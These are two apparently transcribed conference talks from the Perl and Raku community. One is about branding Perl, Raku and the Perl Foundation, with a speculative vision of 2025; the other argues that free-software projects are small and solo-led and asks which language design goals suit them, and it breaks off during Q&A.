10.5446/53254 (DOI)
Hi everybody, my name is Nigel Hamilton. I'm just another Raku and Perl hacker based in Bath in the UK, and I love Perl and I love Raku. But recently, at my last contract, the management decreed that no new things would be written in Perl, and they pronounced it like "Purl", with a U. And that was really sad and disappointing, because I know that, like most Perl programmers and most Raku programmers, we like making new things. So that was really sad to hear. Because unfortunately, Perl and Raku are in the fight for their lives. We have to compete for mind share, for hearts and minds, in an increasingly crowded marketplace. And if you look at all the brands here, we need a way of having our brands stand out, holding their position, and not only holding their position but growing it. So how can Perl and Raku take their place in the hearts and minds of developers? Because unfortunately, it's not enough for just the language to succeed. The ecosystem around the language also needs to succeed. If you think of Node and npm and other packaging systems, it's the core language, but it's also the packaging system and the other elements that go around it. And they also need to have strong brands. If we stop and think about it, I think we can realise that this problem has been going on for a long time. In fact, I'd like to suggest that it was happening even before that fateful mug got thrown in the year 2000, which saw the beginnings of the Perl 6 effort. I think we had a branding problem back then. And I want to take you back there, because I think we need to make peace with the past. So jump in your time machine of choice and join me back in 1999, and let's see if we can exorcise some of the things that happened then so that we can move forward. Well, welcome to London, 1999. This is Canary Wharf, one of the banking districts. And I'm a new visitor to the UK. I'm on a working holiday visa, and I'm starting work at Canary Wharf at a global bank in the web technology department. All good. One of my colleagues introduced me to this new search engine, Google, which was in beta. And I thought, well, that looks pretty cool. But I used AltaVista, and their brand value was "smart is beautiful", and they used to have a nice kind of mountain range as part of their icon. But as things developed with AltaVista, it got more and more busy. And I wonder: what if their brand value had been "smart is simple"? Well, things were going okay in the web technology department. There was lots of work around the bank, and one of my first projects was to create a system for the audit department, which would be rolled out in New York, Tokyo and London. It was used by top-level management to sign off on their various audit points. And it was written in Perl. And Perl did a great job. Within two months we had this in production, and we had happy clients in the bank, which was all good. But then things took a slight turn for the worse. My boss wanted help with a Java applet that we could write once and run anywhere around the bank. It was going to be a trader chat app, with which all the traders would be able to chat and communicate with each other. And it was going to run fast and quick. My boss at the time was really excited about all this. But I was a little bit worried, because my experience of Java, and especially Java applets, was that it actually was a bit clunky. 
But the marketing department behind Java was going into overdrive, and the legal department too. We can see here the Java page in 1999, with a logo in the top left-hand corner and various TMs scattered around the page. And later that year, those TMs could be changed to an R, because at the UK trademark office, the Intellectual Property Office, they were officially registered as trademarks. So their legal department was doing the right things as well. And they were generating buzz, because they were reaching out to various corporate markets. And okay, the enterprise computing era was about to arrive, just as soon as that Java applet finished loading. But nonetheless, they had a story to tell. And even though their Java SDK was only at version two beta, they were already addressing various industries: aerospace, banking, et cetera. So the marketing and the legal departments were really building an effective brand stack. At the very base, they had secured the legal rights to the brand. And on top of that, they were developing values that could be associated with the brand: values like ubiquitous technology, developer productivity, enterprise innovation. These are some of the values that the marketing department was looking to associate with the Java brand. And these values then found their way into various messages: write once, run anywhere; oh, there are no pointers in Java; this is going to be the future of the web. And these messages were directed at audiences: developers got certain types of messages, industry leaders got their messages, and enterprise managers, like my boss, got theirs. But a brand stack is nothing if, in the end, it doesn't make a connection with its audience. And ideally that needs to be some sort of emotional connection. So you might like to think of some of your favorite brands, your favorite beer. What's your emotional connection with that brand? If that brand was taken away from you, how would you feel about it? If you could no longer drink your favorite beer, for example. So the brand stack is important. It's a way of connecting with customers, with users. And ideally, each level of the brand stack needs to work with the others. So my boss was excited and buzzed up about Java. This trader chat app was going to be fantastic. He had hope that he was going to get an even bigger bonus this year. And he was inspired by all the talk of enterprise computing on the Java website. And Sun Microsystems was paying a lot in marketing dollars to keep the buzz going, to effectively keep the blood flowing between all these messages and back to the brand, to grow the goodwill of Java. And to some extent they succeeded. But for me, as a developer, I've got to admit I had a different set of emotions, because having been given the trader chat app, I'd spent about a week and a half underneath my desk power-cycling my computer, because every time I loaded the applet, it would bring my computer to a complete halt. So my emotions were quite different. This Java applet really wasn't going to work. And I was anxious about it. I was frustrated that the Java messaging didn't actually relate to the Java reality. The truth was that this applet was not going to be able to roll out everywhere around the bank. It could barely run on my machine. 
So I dreaded the idea of going down to the trading floor, showing these traders, and watching them gape as the thing took ages to load, just thinking of the money that was falling on the floor. So in this case, the brand stack backfired. Because rather than having all those positive emotions, actually there's a cooling off, as the messages don't quite add up with the brand values and the brand itself leaks reputation. So for me, Java's brand stack in 1999 looked something like this. Yes, it had a bit of legal foundation. Yes, they had some values that they were going after. And yes, some of the messages related to those values. But the reality didn't quite add up. And to survive as a strong technology, you need good technology, but you also need a strong brand stack as well. In fact, ideally, you need an authentic brand stack, where all the layers of your brand stack actually add up and the messages are consistent. And when this happens, your brand starts to grow. Instead of leaking goodwill, like a battery it starts to take charge, reputational charge, as things grow, as the various emotions and feelings are backed up by messages, and the messages come true for the target audience. And when this happens, you get a magic result, which is that audiences will introduce new audiences to your brand. It becomes a word-of-mouth brand rather than one that's just pumped up by corporate marketing. And in this way, the brand can really take off. And that's the essential feature of an authentic brand, and something that I think would be really useful for Perl and Raku. So, it's around about this time that I got out from under my desk, rebooting the machine to try and get the Java applet to run, and I took a call from my client, my first client in the bank, in the audit department: the head of audit. And he said, I've got some good news. The Perl system you wrote is doing really well. Have you got anything you can send me about Perl, about the technology behind it? I said, sure, no problem. I mean, I was busy with the Java thing, so I quickly sent him a link to perl.org in 1999. And something good to say about this page is that, unlike the Java page, it fully loads. But then, after a couple of days, the head of audit called me back and said, I've just got a couple of questions. And when an auditor asks you "I've got a couple of questions", it's a scary moment. When the head of audit for a global bank asks you "I've just got a couple of questions", it's absolutely terrifying. And he was asking me questions like this: now, you said to me that the version of Perl that we've got in production is version five. Why is this website saying Perl is at version two? And my answer was something like, well, I mean, I know Java's at version two, but Perl is more mature than Java, and yes, it's version five, so I'm not sure why it says two. And then came the next question: do we need to have a license with O'Reilly and Associates to use Perl? No, no, O'Reilly and Associates, they just sell books. There was a camel on a book once, and that's O'Reilly and Associates. No, Perl isn't owned by O'Reilly and Associates. And then the next question: here's the Perl Institute. What do they do? They're dedicated to keeping Perl available. 
Well, in February 1999, they reported a disk crash: files are missing and we're trying to put the pieces back together. Well, I don't know why they're saying that on the main page for Perl, but the truth is that there's actually a Comprehensive Perl Archive Network with almost 100 sites around the world where Perl is mirrored. So actually it's a really robust platform that the bank can rely upon. It's not just one corporate interest; it's mirrored in multiple places. And then finally he asked, well, what about the Perl Institute? I read here that it's actually going to dissolve. They voted to dissolve, and now it's part of the Perl Mongers. And it was at this point that I felt like putting up my hands and going, ah, the truth is the Perl Mongers are just a group of camel herders that like writing software. I really felt like bailing out at that point. But I believed in Perl and Perl's technical stack. Sadly, its brand stack was all over the place. Because in 1999, it seemed that Perl's brand stack was leaning on O'Reilly, or O'Reilly was leaning on Perl. Either way, we didn't have a strong foundation for the basis of a strong brand stack. We certainly didn't have any clear values associated with that brand. We didn't have messages that embodied those values, and we weren't addressing audiences with those values. And the emotions? Well, I had positive emotions, because I could use Perl to get things done and it worked. But Perl's brand stack wasn't helping me. So it was little wonder, then, that only a year later that mug got thrown at the Perl Conference, which sparked the beginnings of Perl 6. I'm sure there were some technical problems with Perl, and I know there were. But at this point in 2000, Java didn't even have regular expressions. They had technical problems too, but they had a much better brand stack. And that was the opportunity in 2000: to make amendments to the tech stack, yes, but really to seize the opportunity of building a brand stack. So I think we have to make peace with it. It's happened. We can't change what's happened in the past. But we do have a chance to do something about the future, and I hope we can think positively about what we can do here. And that's what I'd like to do now. I'd like to jump back into the time machine, but this time, let's go forward. Let's go to 2025 and see what Perl and Raku could look like in 2025. Well, the first thing to say is that in 2025, the Perl Foundation is no more. They've decided to become an authentic brand. And being an authentic brand means that all those layers need to add up. And the truth is that in 2000, the Perl Foundation had a great opportunity to represent not only Perl but also Raku. And so the old name of the Perl Foundation really wasn't an honest representation of what the Perl Foundation does, because actually it's more than that. And so they decided to rename themselves the Artistic Software Foundation, which they could then register as their own independent trademark, and then build an authentic brand stack on that. And in 2020, they reached out to the community to ask, well, what should the brand values be for the Perl Foundation? And thanks, by the way, to those within the community who answered this survey. And we can see here on the left-hand side the top three values of the TPF in 2020, but also the top three values hoped for in the future. 
And what the survey showed is that the users, or the members, or the people who rely on the TPF wanted it to move from being a kind of volunteer support organization to being more passionate about the software projects and communities that it supports, to be more transparent, more professional and more trustworthy. And that's what the TPF did in 2021. They continued this process. And with this rebranding effort, they reached out to the community again, and there was a vote, and this was the logo that got voted in. But there were other professional logos to choose from, and even different names. It wasn't necessarily the Artistic Software Foundation. And I should say, for this view of the future I've taken quite a lot of artistic license, pardon the pun. It's just one future, and it's just meant to be kind of a guide. Because the Artistic Foundation in 2025 needed to have not just a small number of brands; it needed a successful, flourishing ecosystem of brands that support each other. So how did Raku go by 2025? What does Raku look like? Well, the good news is that Raku has continued its journey to build an authentic brand stack, and goodwill and reputation are growing in its brand battery. And how did they do that? Well, in August 2020, they set up the foundations. They started putting in place the legal foundations for their brand stack, and the trademark was registered in the UK in August 2020. There was a little bit of a stumbling block at the US Trademark Office. The examiner there said, well, hang on, you're not using Raku as a trademark on your website. You need to put your hand up and say, hey, this is being used as a trademark. And so thanks to Daniel Sockwell, who serves both on the Raku Steering Council and on the TPF Legal Committee, he was able to make the change here to help satisfy the examiner's concerns, which meant that later Raku could also be registered as a trademark in the US. And then later, in 2021, the Raku community came together again to update the website with its trademarks, to signal to the user community that we're using this name, this is the base of our brand stack, and we're proud of it. And they updated the website to actually show what their values are. Rather than saying "we intend to carry forward the high ideals of the Perl community", they were actually specific. During 2021, they did a survey and found out what the actual values of the Raku community were, the distinct values, and they were able to clearly say what those values were. And once they had those values, they could then begin to reach out to the early adopters for Raku. Raku's mascot in 2025 is still loved, with its common-law protection, the TM there, and the clear license that Larry Wall wrote when he created Camelia. And Camelia's got deep and hidden meanings. So yes, there's "camel" in her name. And that P6 is now kind of like a scar that the community uses to remember all the hard work and effort that went into getting Raku to where it is today in 2025. And that's something that we appreciate about the logo. Because in 2025, Raku has become known as a productive, general-purpose dynamic language. It's known to be optimized for fun. So no matter what level of ability you have, whether you're a new starter or a seasoned programmer, Raku has the ability to get you into a productive state quickly. 
And the teaching resources that came out in 2021 helped computer science lecturers around the world create courses in CS 102 that gave new students a taste of different paradigms: functional, procedural, et cetera. And then later subjects in the computer science curriculum picked up Raku as a teaching language. So in 2025, people were graduating with skills in Raku. Schools were starting to take up Raku examples in their teaching because they wanted their students to be ready for what they were going to see at university. And Raku's brand stack was starting to grow organically. No big marketing budget required, because its values and its messages and audiences were adding up. This meant that it started to grow. And the emotions were all good. Programmers were describing a sense of joy and elevation when they were coding in Raku. And from the business point of view, they were happy they had productive programmers creating software with Raku. Now, we are missing a piece in the puzzle here. What's this brand? In 2025, where is Perl going to be? Well, in 2021, now that the Perl Steering Council had been formed in 2020, it was time for Perl to take its place in the marketplace of ideas and software that it needed to compete in. And for the first time, it took up the challenge of building its own unique, distinctive brand stack. And in 2025, the Perl brand is growing. It's expanding. The unique values that were found in 2021 are still there. The messages still add up, and the audiences still appreciate Perl for what it is. And there are lots of positive emotions around Perl. So in 2021, the perl.org website got a revamp. At the moment, in 2021, the site just says, well, that's why we love Perl. It doesn't really clearly say why we love Perl. And in 2021, we found out, because Perl 7 represented a great opportunity to uncover the brand trajectory for Perl: where the values are now and where the values will be in the future. And rather than calling it Perl 7, actually, the Perl Steering Council decided to give it a new name: Perl Something. And I don't know what that name is, but it's there. And there's that camel. And when I saw this, I almost had post-traumatic stress from 1999, because it's still there. For some reason, we are using a publisher's brand on our website. So in 2021, we finally said goodbye to the camel. And importantly, we didn't replace it with anyone else's camel. Because to compete in this marketplace, we actually need a distinctive brand that no one can confuse with anything else. And frankly, it's something that Perl deserves. And I think a root vegetable that makes you cry is probably also not something which would embody those values that were uncovered in 2021. So no: instead, with the help of the Artistic Foundation, or the Perl Foundation, the Perl Steering Council, once they established what the value trajectory was, asked for three new brands to be designed, three logos, professionally designed, which then went out to the community for voting. So the community could finally get a sense of ownership over this brand, a sense of attachment to it, which is something that had previously not been the case with the camel and the onion. And so there's a real opportunity here for a fresh start, not just for the tech stack, but importantly for the brand stack. 
And this new alias for Perl 7 was also embodied as a literal alias inside the Perl package, so that you could invoke the Perl interpreter with this new alias as well. And by 2025, users would sometimes refer to the language by its alias and not just simply as Perl. So by 2025, with an authentic brand stack, Perl actually adds up for its user base. It has clear values which result in messages that are clear. The audiences then hear messages that relate to the reality of Perl. And there are positive emotions. And there's no reason why Perl can't have its own distinct space. But it'll need an authentic brand to do it. And in 2025, there's no reason why the emotions associated with the Perl brand aren't ones like this: it's still a brand that we love. We're satisfied using it. It does the job. And we trust the source from where it comes. We trust the history and the testing and the blood, sweat and tears that have gone into creating Perl over the past 30 years. And the Artistic Foundation now has, in 2025, a clear set of projects and communities that it supports. And each community has its own distinct brand identity. And we're able to support those brands so that they can support themselves. Because in 2025, for us to succeed, we will need strong, authentic brands. I think we can do it. Because actually, there's something that money can't buy with both Perl and Raku: 30 years of effort. Technical effort, volunteer effort, community effort, blood, sweat and tears have gone into Perl. There's no amount of marketing budget that can buy that. There's a lot of heart in Perl, and I honestly believe it just needs to be unleashed with a proper brand stack. And we can create a brand that the community feels a part of. And likewise with Raku: it also needs to take its space, and it also will need a strong brand stack. Let's hope we can get there. Thanks for listening.
The TPF is passionate about helping our software communities flourish. This is an update from a legal and marketing perspective on the communities' brands and some suggested next steps to help them flourish.
10.5446/53256 (DOI)
In this presentation, I'll be discussing a question that is very important to me: what makes a programming language good? Not just in general terms, but specifically good for writing free software. Before diving into that, though, I'd like to take the opportunity to introduce myself to those of you who don't know me. My name is Daniel, but some of you may know me as Code Sections if you've seen me around the Raku community. I'm a full-time free-software developer, and my primary programming language is Raku, although I also program in Rust or other languages as the need arises. I also serve on the Raku Steering Council. Before switching to software, I was a practicing attorney with a law firm in New York City, and though I no longer practice, the mindsets are a bit more similar than you might think. Oh, and one other note: the icon that I use, I have noticed, is pretty similar to Camelia, the logo for the Raku programming language, but I wanted to mention that that is just a coincidence, though a happy one that makes me smile every time I notice it. With that out of the way, let's dive in. What makes a programming language especially good for writing free software? In the course of answering that question, there are three different points that I hope to convince you of. First, that free-software projects are different, and when I say different, I really mean that in two different ways. First, free-software projects are different from other types of software projects. And second, and perhaps more surprisingly, free-software projects are different from the image that many people have of them. Second, I'd like to convince you that there are some excellent languages out there that just really aren't very good for writing free software. They're good at other things, but they're not good at that. And third, and relatedly, I'd like to convince you that the ideal free-software language should be different from other languages, even other excellent languages, because it's aiming at different sorts of projects and so should have different design goals. So let's start with how free-software projects are different. I'd like to begin with an even more basic question: what is free software? What are typical free-software projects? A lot of times people talk about free software by mentioning Linux or Firefox or other high-profile open-source projects. And some people have said that free software is like building a cathedral, where you have a group of architects and then many laborers who execute their plan. And other people have said, no, it's like a bazaar, where many people work together along similar lines, but there's little or no central organization, yet somehow out of that chaos, order emerges. Those are both kind of dated. More recently, I've seen a blog post that said free software is really like nuclear power, where you have a huge team that pours a lot of time and energy into an initial reaction, hoping that it will become self-sustaining and produce even more energy in the end. And I just don't really buy any of those. They all have some good points to them, but all of those analogies miss one really important thing. They miss the fact that Linux is a penguin. What I mean by that is you shouldn't think about Linux or Firefox when thinking about free-software projects. Yes, a penguin is a bird, but if you think about penguins when thinking about birds, you're going to end up very confused about birds and have all sorts of the wrong ideas. 
A penguin and Linux are both exceptional examples that are not good to generalize from. And specifically, Linux and Firefox and these other high-profile projects are exceptional in terms of their size. Most free-software projects are extremely small. This is a study from RedMonk, and before you think it doesn't prove my point as well as it does, notice that the axis is logarithmic. So here, diving into their numbers a little bit more, they found that half of the active free-software projects had only one contributor a year, 70% had one or two contributors, and 87% had five or fewer contributors. Another group of academics took a look at the same issue. They came at it from a slightly different angle and looked at truck factor: how many core contributors would it take, for a project to really be in trouble, if they were to go away. But cutting the other way, they took a very narrow definition of what it meant to be popular. They started with just the 100 most-starred repos in six languages and then removed any that were in the bottom 25% in terms of other measures of popularity, which actually cut out the majority of them. So this is just the very most popular projects. But even in that sort of rarefied company, they found that 34% had a truck factor of just one: one primary developer. And another 30% had a truck factor of two. It's nice to have academic studies that give a big-picture view, but it's also helpful, I think, to dive into a more concrete example. So in that spirit, I'd like to talk about Impress.js, which is a somewhat randomly chosen project, but it's the software I use to write the slides that you're watching right now. And I really enjoyed using it. I thought it was a great project. It's very popular, you know, tens of thousands of stars on GitHub. And when I open its contributor page on GitHub, I see that it has 77 contributors. Those aren't all in the same year, but I looked at it a little more closely and it had 16 contributors in its first year. So that would put it outside of the 87% of projects that RedMonk said had five or fewer contributors. So on first look, it seems like an exception to the rule that free-software projects tend to be small. But let's look a little closer. When I dove in, its top contributor had 148 commits. The next contributor had 51 commits, then 14, then six, then just four. So this is not really the story of a project that is a bazaar with 70 different people all working together. It's really the story of a project that has a couple of main contributors and then other people who submitted one-off patches or had particular features that they were interested in implementing. And I want to be clear that I'm not knocking that type of contribution. In fact, I did it myself: I found a couple of features that I wanted to add to Impress while I was writing this presentation and submitted some PRs. And I hope that that was helpful to the project, and I think that that sort of contribution absolutely can be. But I also think that if we're thinking about things in terms of a bazaar model, we're probably going to have the wrong idea. This is not a large group collaboration. This is a story of a couple of people working as main authors and other people helping out, but in a different way. And I said a couple of people, but let's take a look at those couple of main authors. And actually, well, we can notice the timing is kind of interesting. 
The first author had nearly all of their contributions in 2012. After that, the next main author started contributing in 2018. So this really isn't even a story of two people working together. This is the story of a project that had a primary maintainer and then, several years later, a different primary maintainer. So it has really been not a solo project (77 contributors) but a project that has had a solo lead developer. Again, very different from the bazaar sort of model. So yeah, that actually makes me think free software is not like building a cathedral or running a bazaar or running a nuclear power plant. Writing free software is like writing a novel. Let me play out this analogy a little bit. As I just walked through, in both cases you have one author or maybe a small handful of co-authors. In both cases, there are many other contributors: for books, that's editors, agents, publishers; for software, all the contributors of bug fixes, documentation, et cetera. In both cases, those other contributors play a really essential, invaluable role, but they're not playing the same role as the author. And in both cases, the author is very likely to be part of some sort of broader community, a literary community or a coding community, but the actual writing of the code or of the prose is a solitary activity. So if that's the mental model we have, if we think of writing free software as akin to writing a novel, what consequences does that have for us? Well, I want to return to these points. Free-software projects are different from other software projects. They're less collaborative, more like writing a novel. That leads me to believe that some excellent languages are not good for writing free software. I want to turn to that next, and then that will sort of bleed into our discussion of what design goals a free-software language, or a language targeting free software, should have. So I want to talk about three programming languages that I personally think are excellently designed, ones that have gotten a lot of buzz and attention and developer mind share. And I think that even though all of them are very different, all of them are especially poor fits for writing free software. The first language I want to mention is TypeScript, a JavaScript superset that adds types and transpiles to JavaScript and really targets, among other things, front-end development and executing in a browser. Second, Go, or Golang, a compiled, garbage-collected language that targets fast compile times and is very active in back-end server web development. And finally, Rust, a compiled language with no garbage collector that aims to equal C in performance, is very useful for systems programming, and has gotten a lot of adoption. So these languages, as I said, are three very different languages. They don't have much at all in common other than the fact that they have all gotten a lot of attention and buzz lately. And for good reason, I think; I think all three are excellently designed languages. But they have one other thing in common: the sort of organization that first created them. TypeScript is a Microsoft project. Go is from Google. Rust came out of Mozilla and has now gotten a lot of support from Amazon and really a who's who of large tech companies. And that's exactly what these have in common. They are all the product of large tech companies. Why does that matter so much? Well, I think it matters because it influences their design goals. 
And I say that not just because I've used these languages and have a sense of what their design goals are, and you can sort of read between the lines in their documentation, but because all three of these languages have actually been remarkably explicit about what their design goals are. This is true for all three languages, and I have some links in the notes for this presentation if you're curious about the other languages. But I'd like to particularly focus on a talk and paper that Rob Pike gave describing Go. He said, among much else (and really the whole talk is worth a read), that Go is a programming language designed by Google to help solve Google's problems, and Google has big problems. Now, a lot of people have focused on that last bit, that Google has big problems, big in the sense of the scale that they operate at, being very large. But I really want to focus in on that middle part. This language was, from start to finish, designed to solve Google's problems. And I think the same is true of the other two languages I mentioned. TypeScript was designed to solve Microsoft's problems. Rust was designed pretty explicitly to help Mozilla build a better Firefox. And there's nothing wrong with any of those goals; I want to be clear. I think that those are good goals to have, and it makes sense that some really good programming languages have those sorts of goals. These large tech companies are exactly the sort of company where it makes sense to invest money in developing a whole new language. And as Rob Pike said, they do have big problems. So I can absolutely understand why some languages come out of that environment. But I think that that environment is very different from the solo-developer, free-software, code-as-novel environment that is really important for a free-software language to target. To explain what I mean, I'd like to look at three different features of the big-tech environment compared to the free-software, code-as-novel environment, and then for each of those features, look at how that feature of the environment impacts the design goals of a language targeting that sort of environment. So first, in big tech you have really large teams; in free software, small teams, as we've talked about pretty extensively. Big tech also has high turnover, just like the law firm I worked at. It's not at all uncommon for people to start their career there before quickly moving on to somewhere else, and they're sort of constantly hiring people who have just completed their CS education. In free software, on the other hand, a lot of these small projects have one maintainer for decades, but even if it's not quite that extreme, the turnover is much, much lower. In big tech, people are there because they're getting a paycheck. They may have other motivations as well, but a defining feature of the job is that it is a job. Free-software developers tend to be much more self-motivated. They may or may not be getting paid at all. They're probably getting paid less than they would make spending their time a different way. So the motivation is pretty different. So how do those features of the big-tech environment impact the design goals of a language targeting that environment? Well, when you've got a large team, you really want to have a standard code format. 
You want to use tools like gofmt or rustfmt or Prettier to make all the code look exactly the same, because you want everybody on the team to be able to read each other's code just as if they wrote it themselves. More broadly, you want there to be just one way to do it. That plays out in syntax and style guides, but also in standard library design, and also in just the amount of syntax, the language design itself. And in language design choices, like limiting customization, like operator overloading and other ways that people can sort of make the language their own. And all of that is in service of avoiding dialects. It is really bad if Bob writes some code and then Alice writes some different code and those two, even though they're programming in the same language, might as well be programming in different languages and can't read each other's code. In that talk about the design of Go that I mentioned earlier, this was explicitly called out as one of the design goals for Go: they wanted to avoid subsets or dialects of the language. Things are similar when we talk about high turnover, and those two do tend to go together, but I think high turnover really creates an emphasis on the speed at which people can pick up the language. So you want it to have a familiar syntax. All of these languages bear more than a passing resemblance to C, and that's not at all a coincidence. More broadly, you want the language to be easy to learn, not just in terms of syntax, but in every other aspect of it. If people are only there for a few years, you don't have time for a long learning curve to really pay off. Again, Go was very explicit about this value, and it is famously easy to learn; you can pick up the basics in just a weekend. Rust is a bit of an exception here, in that it is not as easy to pick up. But I think it is clear, if you spend any time in the Rust community, that they take the value of being as easy to learn as possible, consistent with the nature of the language, extremely seriously. If there's anything better, from the perspective of a big-tech environment, than having a language that is easy to teach new hires, it's having a language that you don't need to teach them at all because they already know it. So it is even better for language design if you can make the language popular in whatever way possible. And I think Microsoft and Google and, to a lesser extent, Mozilla have put a lot of emphasis and evangelism behind their languages and making it easy to gain that sort of popularity. The final feature of a big-tech environment that I'd like to focus on is that people are getting paid. I want to be both tactful and precise in talking about this, because it is, of course, the case that there are many absolutely amazing programmers working at these large tech organizations, and working primarily for the paycheck is no reason at all that someone can't be a way better programmer than I'll ever be. But the thing about money is that everybody likes money. So even if many of the people at an organization or on a team are really great programmers, once you start paying people, there is the chance that at least some people there are just sort of doing the minimum they can get away with to not get fired, or to get promoted, or whatever the bar is. And I think that that influences the design of languages targeting that environment. So when you have that sort of environment, a language really wants to avoid footguns. 
If there are features that can be used by someone in a really clever way but can also be used to shoot your foot off, then the language is much more likely to take those out if it is targeting this sort of environment. Again, being a little more general, the language wants to prevent corner-cutting in whatever way possible. Even if that means being more verbose, if it makes things explicit and people have to lay out every step they are going through, that can make it easier to deal with the person who might be inclined to cut some corners if they could get away with it. And finally, the language, from a design perspective, wants to optimize for making the code as reviewable as possible. Small diffs, where you have a style that doesn't indicate that lines have changed when they really haven't. It also means bigger language design issues, like discouraging interactive programming. You don't really want, from this perspective, a program where you have to fire up a REPL and really engage in dialogue with the code; that may be easy for someone to write and easy for someone else to maintain later, but it's hard for someone to read a patch set and really have a sense of whether it's a good change or not. So it is harder to review. So that's the big-tech environment. You've got languages that are built for a large team with high turnover, where people, or at least some of them, may be inclined to cut some corners. And I think that you can hopefully get a feel for the sorts of directions that that pushes the design of the language. I want to be clear that everything I said over there describes values that are higher priorities for that environment. I'm not saying that those are bad things for a free-software language. Certainly I think that free-software languages should aim to be easy to learn and to have reviewable code. But I think that, as I'll get into in just a minute, those aren't quite as high a priority. Reviewable code is great, but if you know that many of the people using the language are going to be on solo projects or very small teams, there probably won't be the same opportunity for code review. So that's not going to be the same priority. So what priorities will there be over here in the free-software world? Well, when you're dealing with a small team, you absolutely want the language to be as powerful as it possibly can be. Free software, or really any time you have a small team, is absolutely the underdog when it's going up against big tech companies. I want to be clear that it is absolutely possible to do a better job with a small team than it is with a huge team. I was using Impress because I think it is a better way to write a presentation than Google Slides, even though it is basically a solo project and Google Slides is funded by the most powerful, best-funded tech company in the world. Similarly, I think Mastodon, with a very small development team, is a better social network than Twitter, with a much larger team. So it is entirely possible for small teams of committed free-software developers to produce better software than huge tech companies, but they've got to acknowledge that they're the underdogs, so they need every advantage they can possibly get. So it is very important that the language be absolutely as powerful as it can be. One of the best ways for a language to be very powerful is for it to be very expressive. 
You know, if you can say more with less, you can write your code faster, you can be more clear, and that is a great way for a small team to catch up to a much larger team. And finally, it is really important for a small team to have their language be composable, especially in the free-software world, where we don't have any licensing difficulties; we're happy to use something no matter how copyleft it may be. And in free software, the projects have small teams individually, but the free-software world as a whole is very large, so to the extent you can follow the UNIX philosophy and have small, composable programs, that again allows a small team to really keep up with a much larger, better-funded team. Low turnover has similar effects, but I want to focus on the teachability aspect. Of course, it is great for a language to be as easy to learn as possible, but when you're in a low-turnover environment, it's perhaps even more important that the language reward mastery. So even if you can't quite get the hang of it at the deepest levels for quite a while, there's time for that level of mastery to pay off. There's also time for domain-specific languages to pay off. You can almost think of a domain-specific language as a language that you always have to teach to new people who join a project. There's no chance they used it at their previous job or project or whatever, because it is specific to the domain that the project is actually in. So that is a disadvantage of domain-specific languages, but when people stick around long enough, the advantages tend to vastly outweigh that, because they offer extreme power and the ability to impose constraints and make the program much, much easier to reason about. So the ideal programming language for a low-turnover environment would really support constructing domain-specific languages to solve particular problems. And now I have expressiveness up there on the slide for a second time, but in a slightly different way this time. The main reason languages might limit expressiveness is to prevent people from writing code that other people can't read, but in a low-turnover environment, there's much more room for a project to develop its own sort of house style. And even if it writes code in a bit of a different way than other users of the language, that's fine if the expressiveness allows that. And in fact, not only is it fine, it's actually very important that the language be expressive, because people are going to need to hold the code in their head much more so than they need to, or even can, in high-turnover, large-team environments. You know, if a code base is two million lines instead of a million lines, that is really not the end of the world, because no one was going to read the million lines anyway. But in a low-turnover environment, if a code base goes from 5,000 lines to 10,000 lines, that does make a pretty huge difference, because it is entirely possible and even likely that someone is going to be trying to understand and reason about the whole code base. And so to the extent the language can be more expressive, more concise, more logical, and someone can sort of hold the whole code base in their mind, that makes it much better for that sort of low-turnover environment. And the final feature of free-software development that I wanted to talk about is that people are mostly self-motivated. They may be getting paid, but probably could be making more somewhere else. 
And some of them are not getting paid at all, working nights and weekends. So that has a few advantages, but it also raises some challenges that a language should try to address. Most importantly, if people aren't getting paid to put up with something, they probably won't. I mean, it's important for every programming language, and really every human community, to be friendly and welcoming and inclusive. But when you're not paying somebody to put up with nonsense, it is especially important. I know this isn't entirely a language design goal; a huge amount of it goes to the community. But there are some things a language can do, in terms of encouraging good documentation. And it's so important that, whether it's a language thing or a community thing, it's worth really emphasizing here. And then, for the third and final time, I promise, I have expressiveness up on these slides. But this is, again, in a slightly different way. There are a tremendous number of different reasons people are motivated to write code, and to write free software in particular. But one of them is the sort of expressiveness, the self-expression, the enjoyment they get out of writing that code. And if every single person writing code to solve a particular problem would solve it in exactly the same way, then it is not nearly as fulfilling to write that sort of code. So if people are self-motivated, the amount of self-expression the code allows them to have is a factor that language designers should consider. And more broadly, if people are writing free software nights and weekends because they want to, it should be fun in whatever way it can be. And in fact, because software developers tend to like using powerful tools and having expressive language features and doing things that fit into all of the other design goals of a language targeting free software, it is probably not going too far to say that a free-software language should be optimized for fun. That last slide might have tipped my hand a bit, but I happen to think that Raku does an excellent job aiming at, and at times achieving, these values that are so important for an ideal free-software language. Exactly how and why I think that is a topic for a whole other presentation, and something I've written about on my blog. But I think Raku does a really good job, and perhaps more importantly than that, I think that Raku is aiming at this in a way that so many other languages aren't, which again is not surprising at all. Most other languages were either initially designed by, or are these days in large part funded and have their development pushed forward by, huge tech companies that operate at the sort of scale where it makes sense for them to really invest in language design. I think Raku is somewhat unique in how closely it is tied to free software in its origin story and in how much it continues to be so closely associated with free software. So I don't think it is at all an accident that Raku is aiming at the free-software use case in a way that many other languages, including some excellent languages, just aren't aiming at. But while I don't think it's an accident, I also don't think it is a guarantee. So I guess part of my goal with this presentation is a bit of a call to action, to say: I hope you agree that these values are really important if a language wants to target free software. 
And I hope that I've persuaded you that it is worth doing so, and I hope that together we can keep Raku targeting that use case and aiming at these sorts of things. I hope you enjoyed this talk, and I look forward to your questions. So I actually have a point that I'd like to expand on just a little bit, based on one of the talks yesterday, before we get to Q&A for this talk. Specifically, I'd like to say something that expands on Matthew's presentation on surprisingly unsurprising features of Raku. And what he said was that even after he has been programming Raku for a long time, for literally longer than Raku has existed, he's still finding things to learn and interesting new features of the language that he hadn't realized were just that unsurprising. And I think that really hits at what I'm getting at with rewarding mastery versus ease of learnability. I absolutely think that Raku, and any language, should prioritize learnability as much as possible. I mean, if I didn't believe that, I wouldn't spend time writing introductory blog posts and contributing to the docs. So that is a real priority of mine, but I think that, at the same time, it is even more important that we build the sort of language where someone can, ten years after they have been using it pretty heavily, still be finding ways to level up, and that they won't sort of hit a peak and plateau there. So I thought that was a great illustration of one of the points, and of how we can strike that trade-off. But it's not about sacrificing teachability. Like I said, that is still really important to me and something I spend a lot of my time on. So that was the follow-up I wanted to add based on yesterday's presentation. Now, Stuart, I think you had agreed to read off and sort of emcee some of the questions. So if anyone else has questions, feel free to put them in the chat or jump into the audio. But, Stuart. Yeah, thank you very much. So, first, thank you very much for your talk, Daniel. That was excellent. There was a comment around signatures. Would you like to expand on that, the point being that they can look somewhat different than coders might expect? Yeah, and I think that that goes into the point about what you're used to at a particular organization: when a language is more flexible, you can develop a sort of house style that you are very comfortable with and then use that, and it will be 